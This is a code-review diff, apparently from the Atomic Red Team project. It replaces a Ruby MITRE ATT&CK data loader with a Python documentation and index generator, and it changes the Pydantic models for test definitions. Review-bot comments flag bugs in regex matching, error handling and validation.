ref.get("source_name") == "mitre-attack" for ref in external_refs
)
if has_mitre_ref:
self._techniques.append(item)
return self._techniques
def get_tactics(self) -> List[dict]:
"""
Returns a list of all ATT&CK tactics.
Returns:
List of tactic dictionaries.
"""
stix_data = self._load_stix()
tactics = []
for item in stix_data.get("objects", []):
if item.get("type") == "x-mitre-tactic":
tactics.append(item)
return tactics
# Singleton instance for convenience - lazy loaded
_attack_api: Optional[Attack] = None
def get_attack_api() -> Attack:
"""Get or create the singleton Attack API instance."""
global _attack_api
if _attack_api is None:
_attack_api = Attack()
return _attack_api
# For backwards compatibility
ATTACK_API = Attack()
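Review bot: `ATTACK_API = Attack()` at the bottom creates a second instance alongside the `_attack_api` singleton behind `get_attack_api()`, so code that uses both parses and caches the STIX bundle twice; make it `ATTACK_API = get_attack_api()` or drop one of them. In `techniques_by_tactic`, `only_platform.match(...)` anchors at the start of the platform string, while the Ruby version used `=~`, which searches anywhere; use `.search` if the old semantics are intended, and note that `.replace(" ", "-")` now replaces every space rather than only the first. Dropping the Ruby fallback that fetched `enterprise-attack.json` from raw.githubusercontent.com at build time is a good change, since the docs build no longer ingests an unverified file over the network; a clear error when the local file is absent would make that intent explicit. Finally, `ordered_tactic_to_technique_matrix` pads the lists returned by `techniques_by_tactic` in place, which is only safe because that method rebuilds its dict on every call; if it is ever cached, as the class docstring promises, the `None` padding would leak into later callers.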
-119
@@ -1,119 +0,0 @@
require 'open-uri'
require 'json'
#
# Attack is an API class that loads information about ATT&CK techniques from MITRE'S ATT&CK
# STIX representation. It makes it very simple to do common things with ATT&CK.
#
class Attack
#
# Tactics as presented in the order that the ATT&CK matrics uses
#
def ordered_tactics
[
'initial-access',
'execution',
'persistence',
'privilege-escalation',
'defense-evasion',
'credential-access',
'discovery',
'lateral-movement',
'collection',
'exfiltration',
'command-and-control',
'impact'
]
end
#
# Returns the technique identifier (T1234) for a Technique object
#
def technique_identifier_for_technique(technique)
technique.fetch('external_references', []).find do |refs|
refs['source_name'] == 'mitre-attack'
end['external_id'].upcase
end
#
# Returns a Technique object given a technique identifier (T1234)
#
def technique_info(technique_id)
techniques.find do |item|
item.fetch('external_references', []).find do |references|
references['external_id'] == technique_id.upcase
end
end
end
#
# Returns the ATT&CK Matrix as a 2D array, in order by `ordered_tactics`
#
def ordered_tactic_to_technique_matrix(only_platform: /.*/)
all_techniques = techniques_by_tactic(only_platform: only_platform)
# make an 2d array of our techniques in the order our tactics appear
all_techniques_in_tactic_order = []
ordered_tactics.each do |tactic|
all_techniques_in_tactic_order << all_techniques[tactic]
end
# figure out the max number of techniques any one tactic has
max_techniques = all_techniques_in_tactic_order.collect(&:count).max
# extend each array of techniques to that length
all_techniques_in_tactic_order.each {|techniques| techniques.concat(Array.new(max_techniques - techniques.count, nil))}
# transpose to give us the data in columnar format
all_techniques_in_tactic_order.transpose
end
#
# Returns a map of all [ ATT&CK Tactic name ] => [ List of ATT&CK techniques associated with that tactic]
#
def techniques_by_tactic(only_platform: /.*/)
techniques_by_tactic = Hash.new {|h, k| h[k] = []}
techniques.each do |technique|
next unless !technique['x_mitre_platforms'].nil?
next unless technique['x_mitre_platforms'].any? { |platform| platform.downcase.sub(" ", "-") =~ only_platform }
next unless technique.fetch('revoked', false) == false
next unless technique.fetch('x_mitre_deprecated', false) == false
technique.fetch('kill_chain_phases', []).select { |phase| phase['kill_chain_name'] == 'mitre-attack' }.each do |tactic|
techniques_by_tactic[tactic.fetch('phase_name')] << technique
end
end
techniques_by_tactic
end
#
# Returns a list of all ATT&CK techniques
#
def techniques
return @techniques unless @techniques.nil?
# pull out the attack pattern objects
@techniques = attack_stix.fetch("objects").select do |item|
item.fetch('type') == 'attack-pattern' && item.fetch('external_references', []).select do |references|
references['source_name'] == 'mitre-attack'
end
end
end
private
#
# Returns the complete ATT&CK STIX collection parsed into a Hash
#
def attack_stix
@attack_stix ||= begin
# load the full attack library
local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
if File.exist? local_attack_json_to_try
JSON.parse File.read(local_attack_json_to_try)
else
JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read
end
end
end
end
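Review bot: in `techniques` the right-hand operand of `&&` is the Array returned by `select`, and an empty Array is truthy in Ruby, so the `source_name == 'mitre-attack'` condition never excludes anything; `item.fetch('external_references', []).any? { |r| r['source_name'] == 'mitre-attack' }` is what was intended. Whichever side of this compare keeps this logic should check for the same slip, and a Python port should not copy it literally, since `[]` is falsy in Python and the two versions would silently disagree. Two smaller points: `next unless !technique['x_mitre_platforms'].nil?` reads better as `next if technique['x_mitre_platforms'].nil?`, and the fallback in `attack_stix` fetches `enterprise-attack.json` from `raw.githubusercontent.com/mitre/cti/master` through `open` (open-uri) with no version pin or checksum, so a docs build without the local file takes whatever is on that branch that day.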
+729
View File
@@ -0,0 +1,729 @@
"""
Atomic Red Team documentation generator.
This module generates all documentation including:
- Individual technique markdown files
- ATT&CK matrices (markdown)
- Platform-specific indexes (markdown, CSV, YAML)
- ATT&CK Navigator layers (JSON)
"""
import csv
import json
import re
from concurrent.futures import ProcessPoolExecutor, as_completed
from io import StringIO
from pathlib import Path
from typing import Dict, List, Optional, Pattern, Tuple
from atomic_red_team.attack_api import ATTACK_API
from atomic_red_team.utils import ATOMIC_RED_TEAM, AtomicRedTeam
import yaml
# Platform configurations for index generation
PLATFORM_CONFIGS = {
"all": {"pattern": re.compile(r".*"), "attack_pattern": re.compile(r".*")},
"windows": {
"pattern": re.compile(r"windows"),
"attack_pattern": re.compile(r"windows"),
},
"macos": {
"pattern": re.compile(r"macos"),
"attack_pattern": re.compile(r"windows"),
},
"linux": {
"pattern": re.compile(r"linux"),
"attack_pattern": re.compile(r"windows"),
},
"iaas": {"pattern": re.compile(r"iaas"), "attack_pattern": re.compile(r"windows")},
"containers": {
"pattern": re.compile(r"containers"),
"attack_pattern": re.compile(r"windows"),
},
"office-365": {
"pattern": re.compile(r"office-365"),
"attack_pattern": re.compile(r"office"),
},
"google-workspace": {
"pattern": re.compile(r"google-workspace"),
"attack_pattern": re.compile(r"office"),
},
"azure-ad": {
"pattern": re.compile(r"azure-ad"),
"attack_pattern": re.compile(r"identity"),
},
"esxi": {"pattern": re.compile(r"esxi"), "attack_pattern": re.compile(r"esxi")},
"iaas:gcp": {
"pattern": re.compile(r"iaas:gcp"),
"attack_pattern": re.compile(r".*"),
},
"iaas:azure": {
"pattern": re.compile(r"iaas:azure"),
"attack_pattern": re.compile(r".*"),
},
"iaas:aws": {
"pattern": re.compile(r"iaas:aws"),
"attack_pattern": re.compile(r".*"),
},
}
def _generate_technique_doc_worker(
args: Tuple[dict, str],
) -> Tuple[str, bool, Optional[str]]:
"""Standalone function for ProcessPoolExecutor to generate a single technique doc."""
atomic_yaml, atomics_directory = args
try:
art = AtomicRedTeam(atomics_directory=atomics_directory)
yaml_path = atomic_yaml["atomic_yaml_path"]
md_path = yaml_path.replace(".yaml", ".md")
technique_id = atomic_yaml.get("attack_technique", "").upper()
art.generate_technique_docs(technique_id, md_path)
return (yaml_path, True, None)
except Exception as ex:
return (atomic_yaml.get("atomic_yaml_path", "unknown"), False, str(ex))
def _generate_matrix_worker(args: Tuple[str, str, str, Optional[str]]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a matrix."""
title_prefix, output_path, atomics_directory, platform_pattern = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
pattern = re.compile(platform_pattern) if platform_pattern else re.compile(r".*")
docs.generate_attack_matrix(title_prefix, Path(output_path), only_platform=pattern)
def _generate_index_worker(
args: Tuple[str, str, str, Optional[str], Optional[str]],
) -> None:
"""Standalone function for ProcessPoolExecutor to generate a markdown index."""
(
title_prefix,
output_path,
atomics_directory,
only_platform_pattern,
attack_platform_pattern,
) = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
only_platform = (
re.compile(only_platform_pattern)
if only_platform_pattern
else re.compile(r".*")
)
attack_platform = (
re.compile(attack_platform_pattern)
if attack_platform_pattern
else re.compile(r".*")
)
docs.generate_index(
title_prefix,
Path(output_path),
only_platform=only_platform,
attack_platform=attack_platform,
)
def _generate_index_csv_worker(
args: Tuple[str, str, Optional[str], Optional[str]],
) -> None:
"""Standalone function for ProcessPoolExecutor to generate a CSV index."""
output_path, atomics_directory, only_platform_pattern, attack_platform_pattern = (
args
)
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
only_platform = (
re.compile(only_platform_pattern)
if only_platform_pattern
else re.compile(r".*")
)
attack_platform = (
re.compile(attack_platform_pattern)
if attack_platform_pattern
else re.compile(r".*")
)
docs.generate_index_csv(
Path(output_path), only_platform=only_platform, attack_platform=attack_platform
)
def _generate_yaml_index_worker(args: Tuple[str, str]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a YAML index."""
output_path, atomics_directory = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
docs.generate_yaml_index(Path(output_path))
def _generate_yaml_index_by_platform_worker(args: Tuple[str, str, str]) -> None:
"""Standalone function for ProcessPoolExecutor to generate a platform-specific YAML index."""
output_path, atomics_directory, platform = args
import importlib
from pathlib import Path
doc_generator = importlib.import_module('atomic_red_team.doc_generator')
utils = importlib.import_module('atomic_red_team.utils')
art = utils.AtomicRedTeam(atomics_directory=atomics_directory)
docs = doc_generator.AtomicRedTeamDocs(atomic_red_team=art)
docs.generate_yaml_index_by_platform(Path(output_path), platform)
class AtomicRedTeamDocs:
"""
Documentation generator for Atomic Red Team.
Generates all documentation including technique docs, indexes, matrices,
and ATT&CK Navigator layers.
"""
def __init__(self, atomic_red_team: Optional[AtomicRedTeam] = None):
"""Initialize the documentation generator."""
self.atomic_red_team = atomic_red_team or ATOMIC_RED_TEAM
self.atomics_directory = self.atomic_red_team.atomics_directory
def generate_all_the_docs(self) -> Tuple[List[str], List[str]]:
"""
Generate all documentation used by Atomic Red Team.
Returns:
Tuple of (successful_paths, failed_paths)
"""
oks = []
fails = []
# Generate individual technique docs concurrently
with ProcessPoolExecutor() as executor:
future_to_yaml = {
executor.submit(
_generate_technique_doc_worker,
(atomic_yaml, self.atomics_directory),
): atomic_yaml
for atomic_yaml in self.atomic_red_team.atomic_tests
}
for future in as_completed(future_to_yaml):
yaml_path, success, error = future.result()
if success:
oks.append(yaml_path)
else:
fails.append(yaml_path)
print(f"{yaml_path}: {error}")
print(f"\nGenerated docs for {len(oks)} techniques, {len(fails)} failures")
# Prepare directories
indexes_dir = Path(self.atomics_directory) / "Indexes"
matrices_dir = indexes_dir / "Matrices"
md_indexes_dir = indexes_dir / "Indexes-Markdown"
csv_indexes_dir = indexes_dir / "Indexes-CSV"
layers_dir = indexes_dir / "Attack-Navigator-Layers"
for dir_path in [matrices_dir, md_indexes_dir, csv_indexes_dir, layers_dir]:
dir_path.mkdir(parents=True, exist_ok=True)
print("\nGenerating indexes and matrices concurrently...")
# Prepare all index generation tasks
tasks = []
# ATT&CK matrices
tasks.append(("matrix", _generate_matrix_worker, ("All", str(matrices_dir / "matrix.md"), self.atomics_directory, None)))
tasks.append(("windows-matrix", _generate_matrix_worker, ("Windows", str(matrices_dir / "windows-matrix.md"), self.atomics_directory, r"windows")))
tasks.append(("macos-matrix", _generate_matrix_worker, ("macOS", str(matrices_dir / "macos-matrix.md"), self.atomics_directory, r"macos")))
tasks.append(("linux-matrix", _generate_matrix_worker, ("Linux", str(matrices_dir / "linux-matrix.md"), self.atomics_directory, r"linux")))
tasks.append(("esxi-matrix", _generate_matrix_worker, ("ESXi", str(matrices_dir / "esxi-matrix.md"), self.atomics_directory, r"esxi")))
# Markdown indexes
tasks.append(("md-index-all", _generate_index_worker, ("All", str(md_indexes_dir / "index.md"), self.atomics_directory, None, None)))
tasks.append(("md-index-windows", _generate_index_worker, ("Windows", str(md_indexes_dir / "windows-index.md"), self.atomics_directory, r"windows", r"windows")))
tasks.append(("md-index-macos", _generate_index_worker, ("macOS", str(md_indexes_dir / "macos-index.md"), self.atomics_directory, r"macos", r"windows")))
tasks.append(("md-index-linux", _generate_index_worker, ("Linux", str(md_indexes_dir / "linux-index.md"), self.atomics_directory, r"linux", r"windows")))
tasks.append(("md-index-iaas", _generate_index_worker, ("IaaS", str(md_indexes_dir / "iaas-index.md"), self.atomics_directory, r"iaas", r"windows")))
tasks.append(("md-index-containers", _generate_index_worker, ("Containers", str(md_indexes_dir / "containers-index.md"), self.atomics_directory, r"containers", r"windows")))
tasks.append(("md-index-office365", _generate_index_worker, ("Office 365", str(md_indexes_dir / "office-365-index.md"), self.atomics_directory, r"office-365", r"office")))
tasks.append(("md-index-google-workspace", _generate_index_worker, ("Google Workspace", str(md_indexes_dir / "google-workspace-index.md"), self.atomics_directory, r"google-workspace", r"office")))
tasks.append(("md-index-azure-ad", _generate_index_worker, ("Azure AD", str(md_indexes_dir / "azure-ad-index.md"), self.atomics_directory, r"azure-ad", r"identity")))
tasks.append(("md-index-esxi", _generate_index_worker, ("ESXi", str(md_indexes_dir / "esxi-index.md"), self.atomics_directory, r"esxi", r"esxi")))
# CSV indexes
tasks.append(("csv-index-all", _generate_index_csv_worker, (str(csv_indexes_dir / "index.csv"), self.atomics_directory, None, None)))
tasks.append(("csv-index-windows", _generate_index_csv_worker, (str(csv_indexes_dir / "windows-index.csv"), self.atomics_directory, r"windows", r"windows")))
tasks.append(("csv-index-macos", _generate_index_csv_worker, (str(csv_indexes_dir / "macos-index.csv"), self.atomics_directory, r"macos", r"macos")))
tasks.append(("csv-index-linux", _generate_index_csv_worker, (str(csv_indexes_dir / "linux-index.csv"), self.atomics_directory, r"linux", r"linux")))
tasks.append(("csv-index-iaas", _generate_index_csv_worker, (str(csv_indexes_dir / "iaas-index.csv"), self.atomics_directory, r"iaas", r"iaas")))
tasks.append(("csv-index-containers", _generate_index_csv_worker, (str(csv_indexes_dir / "containers-index.csv"), self.atomics_directory, r"containers", r"containers")))
tasks.append(("csv-index-office365", _generate_index_csv_worker, (str(csv_indexes_dir / "office-365-index.csv"), self.atomics_directory, r"office-365", r"office")))
tasks.append(("csv-index-google-workspace", _generate_index_csv_worker, (str(csv_indexes_dir / "google-workspace-index.csv"), self.atomics_directory, r"google-workspace", r"identity")))
tasks.append(("csv-index-azure-ad", _generate_index_csv_worker, (str(csv_indexes_dir / "azure-ad-index.csv"), self.atomics_directory, r"azure-ad", r"identity")))
tasks.append(("csv-index-esxi", _generate_index_csv_worker, (str(csv_indexes_dir / "esxi-index.csv"), self.atomics_directory, r"esxi", r"esxi")))
# YAML indexes
tasks.append(("yaml-index-all", _generate_yaml_index_worker, (str(indexes_dir / "index.yaml"), self.atomics_directory)))
for platform in ["windows", "macos", "linux", "office-365", "azure-ad", "google-workspace", "iaas", "containers", "iaas:gcp", "iaas:azure", "iaas:aws", "esxi"]:
filename = f"{platform.replace(':', '_')}-index.yaml"
tasks.append((f"yaml-index-{platform}", _generate_yaml_index_by_platform_worker, (str(indexes_dir / filename), self.atomics_directory, platform)))
# Generate all indexes concurrently
with ProcessPoolExecutor() as executor:
future_to_task = {executor.submit(task[1], task[2]): task[0] for task in tasks}
for future in as_completed(future_to_task):
task_name = future_to_task[future]
try:
future.result()
except Exception as ex:
print(f"✗ Error generating {task_name}: {ex}")
# Generate ATT&CK Navigator layers (this is already optimized internally)
print("\nGenerating ATT&CK Navigator layers...")
self.generate_navigator_layers(layers_dir)
return oks, fails
def generate_attack_matrix(
self,
title_prefix: str,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a Markdown ATT&CK matrix."""
result = f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
result += f"| {' | '.join(ATTACK_API.ordered_tactics)} |\n"
result += f"|{'-----|' * len(ATTACK_API.ordered_tactics)}\n"
matrix = ATTACK_API.ordered_tactic_to_technique_matrix(
only_platform=only_platform
)
for row in matrix:
row_values = []
for technique in row:
if technique:
row_values.append(
self.atomic_red_team.github_link_to_technique(
technique,
include_identifier=False,
only_platform=only_platform,
)
)
else:
row_values.append("")
result += f"| {' | '.join(row_values)} |\n"
output_path.write_text(result, encoding="utf-8")
print(f"Generated ATT&CK matrix at {output_path}")
def generate_index(
self,
title_prefix: str,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
attack_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a Markdown index of ATT&CK Tactic -> Technique -> Atomic Tests."""
result = f"# {title_prefix} Atomic Tests by ATT&CK Tactic & Technique\n"
techniques_by_tactic = ATTACK_API.techniques_by_tactic(
only_platform=attack_platform
)
for tactic, techniques in techniques_by_tactic.items():
result += f"# {tactic}\n"
for technique in techniques:
result += f"- {self.atomic_red_team.github_link_to_technique(technique, include_identifier=True, only_platform=only_platform)}\n"
atomic_tests = self.atomic_red_team.atomic_tests_for_technique(
technique
)
for i, atomic_test in enumerate(atomic_tests):
platforms = atomic_test.get("supported_platforms", [])
if any(only_platform.match(p.lower()) for p in platforms):
result += f" - Atomic Test #{i + 1}: {atomic_test['name']} [{', '.join(platforms)}]\n"
result += "\n"
output_path.write_text(result, encoding="utf-8")
print(f"Generated Atomic Red Team index at {output_path}")
def generate_index_csv(
self,
output_path: Path,
only_platform: Pattern = re.compile(r".*"),
attack_platform: Pattern = re.compile(r".*"),
) -> None:
"""Generate a CSV index."""
output = StringIO(newline="")
writer = csv.writer(output, lineterminator="\n")
writer.writerow(
[
"Tactic",
"Technique #",
"Technique Name",
"Test #",
"Test Name",
"Test GUID",
"Executor Name",
]
)
techniques_by_tactic = ATTACK_API.techniques_by_tactic(
only_platform=attack_platform
)
for tactic, techniques in techniques_by_tactic.items():
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Get atomic YAML to use display_name (which has full technique name for sub-techniques)
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if not atomic_yaml:
continue
tech_name = atomic_yaml.get("display_name", technique.get("name", ""))
atomic_tests = self.atomic_red_team.atomic_tests_for_technique(
technique
)
for i, atomic_test in enumerate(atomic_tests):
platforms = atomic_test.get("supported_platforms", [])
if any(only_platform.match(p.lower()) for p in platforms):
writer.writerow(
[
tactic,
tech_id,
tech_name,
i + 1,
atomic_test.get("name", ""),
atomic_test.get("auto_generated_guid", ""),
atomic_test.get("executor", {}).get("name", ""),
]
)
output_path.write_text(output.getvalue(), encoding="utf-8")
print(f"Generated Atomic Red Team CSV index at {output_path}")
def generate_yaml_index(self, output_path: Path) -> None:
"""Generate a master YAML index."""
result: Dict[str, dict] = {}
techniques_by_tactic = ATTACK_API.techniques_by_tactic()
for tactic, techniques in techniques_by_tactic.items():
result[tactic] = {}
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Create a copy of the technique and update name with display_name from YAML
technique_copy = json.loads(json.dumps(technique)) # Deep copy
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if atomic_yaml and atomic_yaml.get("display_name"):
technique_copy["name"] = atomic_yaml["display_name"]
result[tactic][tech_id] = {
"technique": technique_copy,
"atomic_tests": self.atomic_red_team.atomic_tests_for_technique(
technique
),
}
# Convert through JSON to eliminate YAML aliases (matching Ruby behavior)
# Use explicit_start=True to add '---' at the beginning like Ruby
yaml_content = yaml.dump(
json.loads(json.dumps(result)),
default_flow_style=False,
allow_unicode=True,
sort_keys=False,
explicit_start=True,
)
output_path.write_text(yaml_content, encoding="utf-8")
print(f"Generated Atomic Red Team YAML index at {output_path}")
def generate_yaml_index_by_platform(self, output_path: Path, platform: str) -> None:
"""Generate a platform-specific YAML index."""
result: Dict[str, dict] = {}
techniques_by_tactic = ATTACK_API.techniques_by_tactic()
for tactic, techniques in techniques_by_tactic.items():
result[tactic] = {}
for technique in techniques:
tech_id = ATTACK_API.technique_identifier_for_technique(technique)
# Create a copy of the technique and update name with display_name from YAML
technique_copy = json.loads(json.dumps(technique)) # Deep copy
atomic_yaml = self.atomic_red_team._get_atomic_by_id(tech_id)
if atomic_yaml and atomic_yaml.get("display_name"):
technique_copy["name"] = atomic_yaml["display_name"]
result[tactic][tech_id] = {
"technique": technique_copy,
"atomic_tests": self.atomic_red_team.atomic_tests_for_technique_by_platform(
technique, platform
),
}
yaml_content = yaml.dump(
json.loads(json.dumps(result)),
default_flow_style=False,
allow_unicode=True,
sort_keys=False,
explicit_start=True,
)
output_path.write_text(yaml_content, encoding="utf-8")
print(f"Generated Atomic Red Team YAML index at {output_path}")
def _get_layer(self, techniques: List[dict], layer_name: str) -> dict:
"""Create an ATT&CK Navigator layer structure."""
filters = {}
if "Windows" in layer_name:
filters = {"platforms": ["Windows"]}
elif "macOS" in layer_name:
filters = {"platforms": ["macOS"]}
elif "Linux" in layer_name:
filters = {"platforms": ["Linux"]}
return {
"name": layer_name,
"versions": {"attack": "16", "navigator": "5.1.0", "layer": "4.5"},
"description": f"{layer_name} MITRE ATT&CK Navigator Layer",
"domain": "enterprise-attack",
"filters": filters,
"gradient": {
"colors": ["#ffffff", "#ce232e"],
"minValue": 0,
"maxValue": 10,
},
"legendItems": [
{"label": "10 or more tests", "color": "#ce232e"},
{"label": "1 or more tests", "color": "#ffffff"},
],
"techniques": techniques,
}
def _update_techniques_list(
self,
current_technique: dict,
current_technique_parent: dict,
techniques_list: List[dict],
atomic_yaml: dict,
comments: bool,
) -> None:
"""Update the techniques list with a new technique."""
tech_id = atomic_yaml.get("attack_technique", "")
if "." not in tech_id:
# This is a parent technique
tech_parent = next(
(
t
for t in techniques_list
if t["techniqueID"] == tech_id.split(".")[0]
),
None,
)
if tech_parent:
tech_parent["score"] += current_technique["score"]
if comments:
tech_parent["comment"] = current_technique.get("comment", "")
else:
if not comments:
current_technique.pop("comment", None)
techniques_list.append(current_technique)
else:
# This is a sub-technique
parent_id = tech_id.split(".")[0]
tech_parent = next(
(t for t in techniques_list if t["techniqueID"] == parent_id), None
)
if tech_parent:
tech_parent["score"] += current_technique["score"]
else:
current_technique_parent["score"] += current_technique["score"]
techniques_list.append(current_technique_parent)
if not comments:
current_technique.pop("comment", None)
techniques_list.append(current_technique)
def generate_navigator_layers(self, output_dir: Path) -> None:
"""Generate all ATT&CK Navigator layers."""
# Initialize technique lists for each platform
platforms_data = {
"all": [],
"windows": [],
"macos": [],
"linux": [],
"iaas": [],
"iaas_aws": [],
"iaas_azure": [],
"iaas_gcp": [],
"containers": [],
"google_workspace": [],
"azure_ad": [],
"office_365": [],
"esxi": [],
}
platform_patterns = {
"windows": re.compile(r"windows", re.I),
"macos": re.compile(r"macos", re.I),
"linux": re.compile(r"linux", re.I),
"iaas": re.compile(r"^iaas", re.I),
"iaas_aws": re.compile(r"^iaas:aws", re.I),
"iaas_azure": re.compile(r"^iaas:azure", re.I),
"iaas_gcp": re.compile(r"^iaas:gcp", re.I),
"containers": re.compile(r"^containers", re.I),
"google_workspace": re.compile(r"^google-workspace", re.I),
"azure_ad": re.compile(r"^azure-ad", re.I),
"office_365": re.compile(r"^office-365", re.I),
"esxi": re.compile(r"^esxi", re.I),
}
for atomic_yaml in self.atomic_red_team.atomic_tests:
tech_id = atomic_yaml.get("attack_technique", "")
base_technique = {
"techniqueID": tech_id,
"score": 0,
"enabled": True,
"comment": "\n",
"links": [
{
"label": "View Atomic",
"url": f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{tech_id}/{tech_id}.md",
}
],
}
base_parent = {
"techniqueID": tech_id.split(".")[0],
"score": 0,
"enabled": True,
"links": [
{
"label": "View Atomic",
"url": f"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/{tech_id.split('.')[0]}/{tech_id.split('.')[0]}.md",
}
],
}
# Create platform-specific technique copies
techniques = {
key: {**base_technique, "comment": "\n"} for key in platforms_data
}
technique_parents = {key: {**base_parent} for key in platforms_data}
has_tests = {key: False for key in platforms_data}
for atomic in atomic_yaml.get("atomic_tests", []):
techniques["all"]["score"] += 1
supported_platforms = atomic.get("supported_platforms", [])
for platform_key, pattern in platform_patterns.items():
if any(pattern.match(p) for p in supported_platforms):
has_tests[platform_key] = True
techniques[platform_key]["score"] += 1
techniques[platform_key]["comment"] += f"- {atomic['name']}\n"
# Update the all techniques list
self._update_techniques_list(
techniques["all"],
technique_parents["all"],
platforms_data["all"],
atomic_yaml,
False,
)
# Update platform-specific lists
for platform_key in platform_patterns:
if has_tests[platform_key]:
self._update_techniques_list(
techniques[platform_key],
technique_parents[platform_key],
platforms_data[platform_key],
atomic_yaml,
True,
)
# Write layers
layer_configs = [
("all", "art-navigator-layer.json", "Atomic Red Team"),
(
"windows",
"art-navigator-layer-windows.json",
"Atomic Red Team (Windows)",
),
("macos", "art-navigator-layer-macos.json", "Atomic Red Team (macOS)"),
("linux", "art-navigator-layer-linux.json", "Atomic Red Team (Linux)"),
("iaas", "art-navigator-layer-iaas.json", "Atomic Red Team (Iaas)"),
(
"iaas_aws",
"art-navigator-layer-iaas-aws.json",
"Atomic Red Team (Iaas:AWS)",
),
(
"iaas_azure",
"art-navigator-layer-iaas-azure.json",
"Atomic Red Team (Iaas:Azure)",
),
(
"iaas_gcp",
"art-navigator-layer-iaas-gcp.json",
"Atomic Red Team (Iaas:GCP)",
),
(
"containers",
"art-navigator-layer-containers.json",
"Atomic Red Team (Containers)",
),
(
"google_workspace",
"art-navigator-layer-google-workspace.json",
"Atomic Red Team (Google-Workspace)",
),
(
"azure_ad",
"art-navigator-layer-azure-ad.json",
"Atomic Red Team (Azure-AD)",
),
(
"office_365",
"art-navigator-layer-office-365.json",
"Atomic Red Team (Office-365)",
),
("esxi", "art-navigator-layer-esxi.json", "Atomic Red Team (ESXi)"),
]
for platform_key, filename, layer_name in layer_configs:
layer = self._get_layer(platforms_data[platform_key], layer_name)
output_path = output_dir / filename
# Use separators without spaces to match Ruby's compact JSON output
output_path.write_text(
json.dumps(layer, separators=(",", ":")), encoding="utf-8"
)
print(f"Generated Atomic Red Team ATT&CK Navigator Layer at {output_path}")
def generate_all_docs() -> Tuple[List[str], List[str]]:
"""Generate all Atomic Red Team documentation."""
return AtomicRedTeamDocs().generate_all_the_docs()
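Review bot: failures in the index/matrix stage never reach the caller: the `except Exception` around `future.result()` in `generate_all_the_docs` prints `✗ Error generating ...` and moves on without appending to `fails`, so a broken matrix or index still returns a clean `(oks, fails)` and the CLI exits 0; append the task name to `fails` (or re-raise after the loop). Three further points. First, `attack_pattern` is `r"windows"` for `macos`, `linux`, `iaas` and `containers` both in `PLATFORM_CONFIGS` and in the `md-index-*` tasks, while the matching `csv-index-*` tasks use the platform's own pattern, so the macOS/Linux/IaaS/Containers markdown indexes are built from the Windows technique list; if that mirrors the Ruby output on purpose, say so in a comment, and note that `PLATFORM_CONFIGS` is not referenced anywhere else in this file. Second, `only_platform.match(p.lower())` in `generate_index` and `generate_index_csv` anchors at the start of the string, unlike the Ruby `=~`, which searches anywhere; the current patterns are all prefixes so the output agrees today, but `re.search` is the faithful port (e.g. `r"azure"` would stop matching `iaas:azure` under `match`). Third, every worker task builds a fresh `AtomicRedTeam`, and the matrix/index workers re-import this very module through `importlib` even though `Path` and the module's classes are already importable at top level; `ProcessPoolExecutor(initializer=...)` can build one instance per worker process, and the workers can reference `AtomicRedTeamDocs` directly.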
+25 -12
View File
@@ -121,13 +121,7 @@ Argument = Annotated[
]
class StrictModel(BaseModel):
model_config = ConfigDict(
validate_default=True, extra="forbid", validate_assignment=True
)
class Executor(StrictModel):
class Executor(BaseModel):
name: ExecutorType
elevation_required: bool = False
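Review bot: removing `StrictModel` drops `extra="forbid"`, `validate_assignment=True` and `validate_default=True` from `Executor`, and from `Dependency` and `Technique` in the hunks below; in Pydantic v2 a nested model does not inherit its parent's config, so only `Atomic`, which regains the `ConfigDict` further down, still rejects unknown keys, and a misspelt key inside `executor:` or a dependency block now validates silently. If loosening this is intended it deserves a line in the commit message; otherwise keep the config on each model, for example by leaving the shared base class in place.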
@@ -140,16 +134,32 @@ class ManualExecutor(Executor):
class CommandExecutor(Executor):
name: Literal["powershell", "sh", "bash", "command_prompt"]
command: constr(min_length=1)
cleanup_command: Optional[str] = None
cleanup_command: Optional[constr(min_length=1)] = None
@field_validator("cleanup_command", mode="before")
@classmethod
def validate_cleanup_command(cls, v):
"""Reject empty cleanup_command strings - treat them as None or error."""
if v is not None and isinstance(v, str) and v.strip() == "":
raise PydanticCustomError(
"empty_cleanup_command",
"'cleanup_command' shouldn't be empty. Provide a valid command or remove the key from YAML",
{"loc": ["executor", "cleanup_command"], "input": v},
)
return v
class Dependency(StrictModel):
class Dependency(BaseModel):
description: constr(min_length=1)
prereq_command: constr(min_length=1)
get_prereq_command: Optional[str]
class Atomic(StrictModel):
class Atomic(BaseModel):
model_config = ConfigDict(
validate_default=True, extra="forbid", validate_assignment=True
)
test_number: Optional[str] = None
name: constr(min_length=1)
description: constr(min_length=1)
